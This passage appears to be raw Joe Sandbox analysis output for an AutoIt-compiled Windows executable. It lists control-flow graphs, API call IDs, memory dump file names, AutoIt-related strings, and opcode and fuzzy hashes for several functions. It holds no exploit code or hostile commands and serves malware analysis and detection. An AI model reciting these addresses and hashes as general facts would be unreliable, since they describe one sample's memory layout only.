                                                                                                                    control_flow_graph 482 7ff7bb801d80-7ff7bb801e17 call 7ff7bb7e9640 GetVersionExW call 7ff7bb7e7cf4 487 7ff7bb801e1d 482->487 488 7ff7bb849450 482->488 490 7ff7bb801e20-7ff7bb801e46 call 7ff7bb7edda4 487->490 489 7ff7bb849457-7ff7bb84945d 488->489 491 7ff7bb849463-7ff7bb849480 489->491 496 7ff7bb801fc1 490->496 497 7ff7bb801e4c 490->497 491->491 493 7ff7bb849482-7ff7bb849485 491->493 493->490 495 7ff7bb84948b-7ff7bb849491 493->495 495->489 499 7ff7bb849493 495->499 496->488 498 7ff7bb801e53-7ff7bb801e59 497->498 500 7ff7bb801e5f-7ff7bb801e7c 498->500 502 7ff7bb849498-7ff7bb8494a1 499->502 500->500 501 7ff7bb801e7e-7ff7bb801e81 500->501 501->502 503 7ff7bb801e87-7ff7bb801ed6 call 7ff7bb7edda4 501->503 502->498 504 7ff7bb8494a7 502->504 507 7ff7bb849645-7ff7bb84964d 503->507 508 7ff7bb801edc-7ff7bb801ede 503->508 504->496 509 7ff7bb84965a-7ff7bb84965d 507->509 510 7ff7bb84964f-7ff7bb849658 507->510 511 7ff7bb8494ac-7ff7bb8494af 508->511 512 7ff7bb801ee4-7ff7bb801efa 508->512 513 7ff7bb849686-7ff7bb849692 509->513 514 7ff7bb84965f-7ff7bb849674 509->514 510->513 517 7ff7bb801f3c-7ff7bb801f80 GetCurrentProcess IsWow64Process call 7ff7bb806240 511->517 518 7ff7bb8494b5-7ff7bb849501 511->518 515 7ff7bb801f00-7ff7bb801f02 512->515 516 7ff7bb849572-7ff7bb849579 512->516 527 7ff7bb84969d-7ff7bb8496b3 call 7ff7bb8532f4 513->527 519 7ff7bb849676-7ff7bb84967d 514->519 520 7ff7bb84967f 514->520 523 7ff7bb84959e-7ff7bb8495b3 515->523 524 7ff7bb801f08-7ff7bb801f0b 515->524 521 7ff7bb84957b-7ff7bb849584 516->521 522 7ff7bb849589-7ff7bb849599 516->522 517->527 543 7ff7bb801f86-7ff7bb801f8b GetSystemInfo 517->543 518->517 526 7ff7bb849507-7ff7bb84950e 518->526 519->513 520->513 521->517 522->517 530 7ff7bb8495c3-7ff7bb8495d3 523->530 531 7ff7bb8495b5-7ff7bb8495be 523->531 528 7ff7bb8495ed-7ff7bb8495f0 524->528 529 7ff7bb801f11-7ff7bb801f2d 524->529 533 7ff7bb849534-7ff7bb84953c 526->533 534 7ff7bb849510-7ff7bb849518 526->534 550 7ff7bb8496d7-7ff7bb8496dc GetSystemInfo 527->550 551 7ff7bb8496b5-7ff7bb8496d5 call 7ff7bb8532f4 527->551 528->517 542 7ff7bb8495f6-7ff7bb849620 528->542 540 7ff7bb801f33 529->540 541 7ff7bb8495d8-7ff7bb8495e8 529->541 530->517 531->517 537 7ff7bb84954c-7ff7bb849554 533->537 538 7ff7bb84953e-7ff7bb849547 533->538 535 7ff7bb84951a-7ff7bb849521 534->535 536 7ff7bb849526-7ff7bb84952f 534->536 535->517 536->517 547 7ff7bb849564-7ff7bb84956d 537->547 548 7ff7bb849556-7ff7bb84955f 537->548 538->517 540->517 541->517 544 7ff7bb849630-7ff7bb849640 542->544 545 7ff7bb849622-7ff7bb84962b 542->545 546 7ff7bb801f91-7ff7bb801fc0 543->546 544->517 545->517 547->517 548->517 552 7ff7bb8496e2-7ff7bb8496ea 550->552 551->552 552->546 554 7ff7bb8496f0-7ff7bb8496f7 FreeLibrary 552->554 554->546
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentInfoSystemVersionWow64
                                                                                                                    • String ID: |O
                                                                                                                    • API String ID: 1568231622-607156228
                                                                                                                    • Opcode ID: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                                                                    • Instruction ID: e6d5c03e170e8892ea1ca505f5bddfb69f2db5bd7d51627d3e4c2fe2c8a1853a
                                                                                                                    • Opcode Fuzzy Hash: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                                                                    • Instruction Fuzzy Hash: 0CD16211E1D2868DE621AB1CA825579A791BF73798FC4003ADF8D0267DDE6CB520C7F1
                                                                                                                    Function 00007FF7BB87F630 Relevance: 12.4, APIs: 8, Instructions: 350processCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 719 7ff7bb87f630-7ff7bb87f69e call 7ff7bb806240 722 7ff7bb87f6d4-7ff7bb87f6d9 719->722 723 7ff7bb87f6a0-7ff7bb87f6b8 call 7ff7bb7effbc 719->723 725 7ff7bb87f71e-7ff7bb87f723 722->725 726 7ff7bb87f6db-7ff7bb87f6ef call 7ff7bb7effbc 722->726 732 7ff7bb87f6ba-7ff7bb87f6d2 call 7ff7bb7effbc 723->732 733 7ff7bb87f708-7ff7bb87f70d 723->733 727 7ff7bb87f736-7ff7bb87f75c call 7ff7bb7ed4cc call 7ff7bb7ee330 725->727 728 7ff7bb87f725-7ff7bb87f729 725->728 739 7ff7bb87f6f3-7ff7bb87f706 call 7ff7bb7effbc 726->739 748 7ff7bb87f762-7ff7bb87f7cf call 7ff7bb7ed4cc call 7ff7bb7ee330 call 7ff7bb7ed4cc call 7ff7bb7ee330 call 7ff7bb7ed4cc call 7ff7bb7ee330 727->748 749 7ff7bb87f840-7ff7bb87f84a 727->749 731 7ff7bb87f72d-7ff7bb87f732 call 7ff7bb7effbc 728->731 731->727 732->739 740 7ff7bb87f719-7ff7bb87f71c 733->740 741 7ff7bb87f70f-7ff7bb87f717 733->741 739->725 739->733 740->725 740->727 741->731 798 7ff7bb87f806-7ff7bb87f83e GetSystemDirectoryW call 7ff7bb804c68 GetSystemDirectoryW 748->798 799 7ff7bb87f7d1-7ff7bb87f7f3 call 7ff7bb7ed4cc call 7ff7bb7ee330 748->799 750 7ff7bb87f87d-7ff7bb87f8af GetCurrentDirectoryW call 7ff7bb804c68 GetCurrentDirectoryW 749->750 751 7ff7bb87f84c-7ff7bb87f86e call 7ff7bb7ed4cc call 7ff7bb7ee330 749->751 760 7ff7bb87f8b5-7ff7bb87f8b8 750->760 751->750 767 7ff7bb87f870-7ff7bb87f87b call 7ff7bb808d58 751->767 763 7ff7bb87f8ba-7ff7bb87f8eb call 7ff7bb7ff688 * 3 760->763 764 7ff7bb87f8f0-7ff7bb87f8ff call 7ff7bb85f464 760->764 763->764 776 7ff7bb87f905-7ff7bb87f95d call 7ff7bb85fddc call 7ff7bb85fca8 call 7ff7bb85fafc 764->776 777 7ff7bb87f901-7ff7bb87f903 764->777 767->750 767->764 781 7ff7bb87f964-7ff7bb87f96c 776->781 810 7ff7bb87f95f 776->810 777->781 783 7ff7bb87f972-7ff7bb87fa0d call 7ff7bb84d1f8 call 7ff7bb808d58 * 3 call 7ff7bb804c24 * 3 781->783 784 7ff7bb87fa0f-7ff7bb87fa4b CreateProcessW 781->784 788 7ff7bb87fa4f-7ff7bb87fa62 call 7ff7bb804c24 * 2 783->788 784->788 811 7ff7bb87fabe-7ff7bb87faca CloseHandle 788->811 812 7ff7bb87fa64-7ff7bb87fabc call 7ff7bb7e4afc * 2 GetLastError call 7ff7bb7ff214 call 7ff7bb7f13e0 788->812 798->760 799->798 825 7ff7bb87f7f5-7ff7bb87f800 call 7ff7bb808d58 799->825 810->781 815 7ff7bb87facc-7ff7bb87faf0 call 7ff7bb85f7dc call 7ff7bb860088 call 7ff7bb87fb68 811->815 816 7ff7bb87faf5-7ff7bb87fafc 811->816 827 7ff7bb87fb3b-7ff7bb87fb65 call 7ff7bb85f51c 812->827 815->816 821 7ff7bb87fafe-7ff7bb87fb0a 816->821 822 7ff7bb87fb0c-7ff7bb87fb35 call 7ff7bb7f13e0 CloseHandle 816->822 821->827 822->827 825->760 825->798
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Directory$Handle$CloseCurrentLockSyncSystem$CreateErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1787492119-0
                                                                                                                    • Opcode ID: d2e29d3ffbacfca874330b1c48f13b927d8d5c063079190f193b8750392c8347
                                                                                                                    • Instruction ID: 2844b0d2b2a31df63dbc5efa0015ab274303f4b98770370eef935b50b4af081b
                                                                                                                    • Opcode Fuzzy Hash: d2e29d3ffbacfca874330b1c48f13b927d8d5c063079190f193b8750392c8347
                                                                                                                    • Instruction Fuzzy Hash: E9E17C22A08B8185EB10EB6ED4501BDA3A0FF96B88F844536EF5D477B9CF38E4518790
                                                                                                                    Function 00007FF7BB85C7C0 Relevance: 6.0, APIs: 4, Instructions: 24filestringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2695905019-0
                                                                                                                    • Opcode ID: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                                                                    • Instruction ID: 968af74d4b8189c231db13deae88c2bb47c85a4c8a949e63fb8de51943db32c0
                                                                                                                    • Opcode Fuzzy Hash: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                                                                    • Instruction Fuzzy Hash: 1CF05450D0870291EE246B3CA84C3B49360BF63BB5F945330DE7F062F8DFACA4695A90
                                                                                                                    Function 00007FF7BB7E7920 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 178registryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                                                                                    • API String ID: 2667193904-1575078665
                                                                                                                    • Opcode ID: 225168ff79ed4f37d7a2cc2ed8316961558ff62ac886a1d19da4a9804c5ce999
                                                                                                                    • Instruction ID: 20cfb87c4b5751bb93aaa353ab622994021bb92e5a401f54bf87f3b0cd0cf884
                                                                                                                    • Opcode Fuzzy Hash: 225168ff79ed4f37d7a2cc2ed8316961558ff62ac886a1d19da4a9804c5ce999
                                                                                                                    • Instruction Fuzzy Hash: 7B912E22918A4395EB10AF6CE8400B9E364FFA6744BC01136EE4D46ABDDF7CE155C7A0
                                                                                                                    Function 00007FF7BB7E5DEC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 143windowtimeregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 131 7ff7bb7e5dec-7ff7bb7e5e21 133 7ff7bb7e5e23-7ff7bb7e5e26 131->133 134 7ff7bb7e5e91-7ff7bb7e5e94 131->134 135 7ff7bb7e5e98 133->135 136 7ff7bb7e5e28-7ff7bb7e5e2f 133->136 134->133 137 7ff7bb7e5e96 134->137 141 7ff7bb82c229-7ff7bb82c261 call 7ff7bb7fede4 call 7ff7bb802c44 135->141 142 7ff7bb7e5e9e-7ff7bb7e5ea3 135->142 138 7ff7bb7e5e35-7ff7bb7e5e3a 136->138 139 7ff7bb7e5f21-7ff7bb7e5f29 PostQuitMessage 136->139 140 7ff7bb7e5e6b-7ff7bb7e5e76 DefWindowProcW 137->140 143 7ff7bb7e5e40-7ff7bb7e5e43 138->143 144 7ff7bb82c2af-7ff7bb82c2c5 call 7ff7bb85a40c 138->144 147 7ff7bb7e5ec8-7ff7bb7e5eca 139->147 146 7ff7bb7e5e7c-7ff7bb7e5e90 140->146 178 7ff7bb82c267-7ff7bb82c26e 141->178 148 7ff7bb7e5ea5-7ff7bb7e5ea8 142->148 149 7ff7bb7e5ecc-7ff7bb7e5efa SetTimer RegisterWindowMessageW 142->149 150 7ff7bb7e5f2b-7ff7bb7e5f35 call 7ff7bb804610 143->150 151 7ff7bb7e5e49-7ff7bb7e5e4e 143->151 144->147 169 7ff7bb82c2cb 144->169 147->146 155 7ff7bb82c1b8-7ff7bb82c1bb 148->155 156 7ff7bb7e5eae-7ff7bb7e5ebe KillTimer call 7ff7bb7e5d88 148->156 149->147 152 7ff7bb7e5efc-7ff7bb7e5f09 CreatePopupMenu 149->152 171 7ff7bb7e5f3a 150->171 158 7ff7bb7e5e54-7ff7bb7e5e59 151->158 159 7ff7bb82c292-7ff7bb82c299 151->159 152->147 163 7ff7bb82c1f7-7ff7bb82c224 MoveWindow 155->163 164 7ff7bb82c1bd-7ff7bb82c1c0 155->164 165 7ff7bb7e5ec3 call 7ff7bb7e7098 156->165 167 7ff7bb7e5e5f-7ff7bb7e5e65 158->167 168 7ff7bb7e5f0b-7ff7bb7e5f1f call 7ff7bb7e5f3c 158->168 159->140 166 7ff7bb82c29f-7ff7bb82c2aa call 7ff7bb84c54c 159->166 163->147 172 7ff7bb82c1c2-7ff7bb82c1c5 164->172 173 7ff7bb82c1e4-7ff7bb82c1f2 SetFocus 164->173 165->147 166->140 167->140 167->178 168->147 169->140 171->147 172->167 174 7ff7bb82c1cb-7ff7bb82c1df call 7ff7bb7fede4 172->174 173->147 174->147 178->140 182 7ff7bb82c274-7ff7bb82c28d call 7ff7bb7e5d88 call 7ff7bb7e6258 178->182 182->140
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                    • String ID: TaskbarCreated
                                                                                                                    • API String ID: 129472671-2362178303
                                                                                                                    • Opcode ID: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                                                                    • Instruction ID: 1f456036987f284dbff4a15221b69f4a46978bcdf1210c0e4b9e8c7d2766e65c
                                                                                                                    • Opcode Fuzzy Hash: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                                                                    • Instruction Fuzzy Hash: 5551473190C64A89FB24BB6CE854178A258BF6B740FC4053ADE4D466BDCEBDF52483A0
                                                                                                                    Function 00007FF7BB7E3D90 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57windowregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                    • String ID: AutoIt v3 GUI$TaskbarCreated
                                                                                                                    • API String ID: 2914291525-2659433951
                                                                                                                    • Opcode ID: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                                                                    • Instruction ID: c9d594172d3c6bd6db60c563bed693a98bd86ad50b57168329dd8b5a4d2787bb
                                                                                                                    • Opcode Fuzzy Hash: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                                                                    • Instruction Fuzzy Hash: 3E313A32A04B058AE700DF68E8543AC77B4FB65758F90013ACE8D56B68DF7DA169CB90
                                                                                                                    Function 00007FF7BB7FE958 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 304comCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 189 7ff7bb7fe958-7ff7bb7fe9ae 190 7ff7bb7fe9b4-7ff7bb7fe9d3 mciSendStringW 189->190 191 7ff7bb8427e4-7ff7bb8427ea DestroyWindow 189->191 192 7ff7bb7fecbd-7ff7bb7fecce 190->192 193 7ff7bb7fe9d9-7ff7bb7fe9e3 190->193 194 7ff7bb8427f0-7ff7bb842801 191->194 196 7ff7bb7fecd0-7ff7bb7fecf0 UnregisterHotKey 192->196 197 7ff7bb7fecf7-7ff7bb7fed01 192->197 193->194 195 7ff7bb7fe9e9 193->195 199 7ff7bb842835-7ff7bb84283f 194->199 200 7ff7bb842803-7ff7bb842806 194->200 198 7ff7bb7fe9f0-7ff7bb7fe9f3 195->198 196->197 201 7ff7bb7fecf2 call 7ff7bb7ff270 196->201 197->193 202 7ff7bb7fed07 197->202 203 7ff7bb7fecb0-7ff7bb7fecb8 call 7ff7bb7e5410 198->203 204 7ff7bb7fe9f9-7ff7bb7fea08 call 7ff7bb7e3aa8 198->204 199->194 208 7ff7bb842841 199->208 205 7ff7bb842808-7ff7bb842811 call 7ff7bb7e8314 200->205 206 7ff7bb842813-7ff7bb842817 FindClose 200->206 201->197 202->192 203->198 219 7ff7bb7fea0f-7ff7bb7fea12 204->219 212 7ff7bb84281d-7ff7bb84282e 205->212 206->212 217 7ff7bb842846-7ff7bb84284f call 7ff7bb878c00 208->217 212->199 216 7ff7bb842830 call 7ff7bb863180 212->216 216->199 217->219 219->217 222 7ff7bb7fea18 219->222 223 7ff7bb7fea1f-7ff7bb7fea22 222->223 224 7ff7bb842854-7ff7bb84285d call 7ff7bb8546cc 223->224 225 7ff7bb7fea28-7ff7bb7fea32 223->225 224->223 227 7ff7bb842862-7ff7bb842873 225->227 228 7ff7bb7fea38-7ff7bb7fea42 225->228 230 7ff7bb84287b-7ff7bb842885 227->230 231 7ff7bb842875 FreeLibrary 227->231 232 7ff7bb84288c-7ff7bb84289d 228->232 233 7ff7bb7fea48-7ff7bb7fea76 call 7ff7bb7f13e0 228->233 230->227 234 7ff7bb842887 230->234 231->230 235 7ff7bb8428c9-7ff7bb8428d3 232->235 236 7ff7bb84289f-7ff7bb8428c2 VirtualFree 232->236 242 7ff7bb7feabf-7ff7bb7feacc OleUninitialize 233->242 243 7ff7bb7fea78 233->243 234->232 235->232 240 7ff7bb8428d5 235->240 236->235 238 7ff7bb8428c4 call 7ff7bb86321c 236->238 238->235 244 7ff7bb8428da-7ff7bb8428de 240->244 242->244 245 7ff7bb7fead2-7ff7bb7fead9 242->245 246 7ff7bb7fea7d-7ff7bb7feabd call 7ff7bb7ff1c4 call 7ff7bb7ff13c 243->246 244->245 248 7ff7bb8428e4-7ff7bb8428ef 244->248 249 7ff7bb7feadf-7ff7bb7feaea 245->249 250 7ff7bb8428f4-7ff7bb842903 call 7ff7bb8631d4 245->250 246->242 248->245 253 7ff7bb7feaf0-7ff7bb7feb22 call 7ff7bb7ea07c call 7ff7bb7ff08c call 7ff7bb7e39bc 249->253 254 7ff7bb7fed09-7ff7bb7fed18 call 7ff7bb8042a0 249->254 261 7ff7bb842905 250->261 273 7ff7bb7feb24-7ff7bb7feb29 call 7ff7bb804c24 253->273 274 7ff7bb7feb2e-7ff7bb7febc4 call 7ff7bb7e39bc call 7ff7bb7ea07c call 7ff7bb7e45c8 * 2 call 7ff7bb7ea07c * 3 call 7ff7bb7f13e0 call 7ff7bb7fee68 call 7ff7bb7fee2c * 3 253->274 254->253 265 7ff7bb7fed1e 254->265 266 7ff7bb84290a-7ff7bb842919 call 7ff7bb853a78 261->266 265->254 272 7ff7bb84291b 266->272 278 7ff7bb842920-7ff7bb84292f call 7ff7bb7fe4e4 272->278 273->274 274->266 316 7ff7bb7febca-7ff7bb7febdc call 7ff7bb7e39bc 274->316 283 7ff7bb842931 278->283 286 7ff7bb842936-7ff7bb842945 call 7ff7bb863078 283->286 292 7ff7bb842947 286->292 295 7ff7bb84294c-7ff7bb84295b call 7ff7bb8631a8 292->295 301 7ff7bb84295d 295->301 305 7ff7bb842962-7ff7bb842971 call 7ff7bb8631a8 301->305 310 7ff7bb842973 305->310 310->310 316->278 319 7ff7bb7febe2-7ff7bb7febec 316->319 319->286 320 7ff7bb7febf2-7ff7bb7fec08 call 7ff7bb7ea07c 319->320 323 7ff7bb7fed20-7ff7bb7fed25 call 7ff7bb804c24 320->323 324 7ff7bb7fec0e-7ff7bb7fec18 320->324 323->191 325 7ff7bb7fec8a-7ff7bb7feca9 call 7ff7bb7ea07c call 7ff7bb804c24 324->325 326 7ff7bb7fec1a-7ff7bb7fec24 324->326 338 7ff7bb7fecab 325->338 326->295 328 7ff7bb7fec2a-7ff7bb7fec3b 326->328 328->305 331 7ff7bb7fec41-7ff7bb7fed71 call 7ff7bb7ea07c * 3 call 7ff7bb7fee10 call 7ff7bb7fed8c 328->331 347 7ff7bb842978-7ff7bb842987 call 7ff7bb86d794 331->347 348 7ff7bb7fed77-7ff7bb7fed88 331->348 338->326 351 7ff7bb842989 347->351 351->351
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DestroySendStringUninitializeUnregisterWindow
                                                                                                                    • String ID: close all
                                                                                                                    • API String ID: 1992507300-3243417748
                                                                                                                    • Opcode ID: 898e7ad48959ea57d970830a0d3bf25c9db69e83af24dfb35c39e817a9ff6a77
                                                                                                                    • Instruction ID: 783a35fd72a1337a614a61e5f67b5b2fef001c8966b8b419b764eea7388961b1
                                                                                                                    • Opcode Fuzzy Hash: 898e7ad48959ea57d970830a0d3bf25c9db69e83af24dfb35c39e817a9ff6a77
                                                                                                                    • Instruction Fuzzy Hash: A9E12D21B1994285EE58FF1EC55027CA360BFAAB44F944036DF0E572B9DF38E862C764
                                                                                                                    Function 00007FF7BB7E3B84 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60windowregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                    • String ID: AutoIt v3
                                                                                                                    • API String ID: 423443420-1704141276
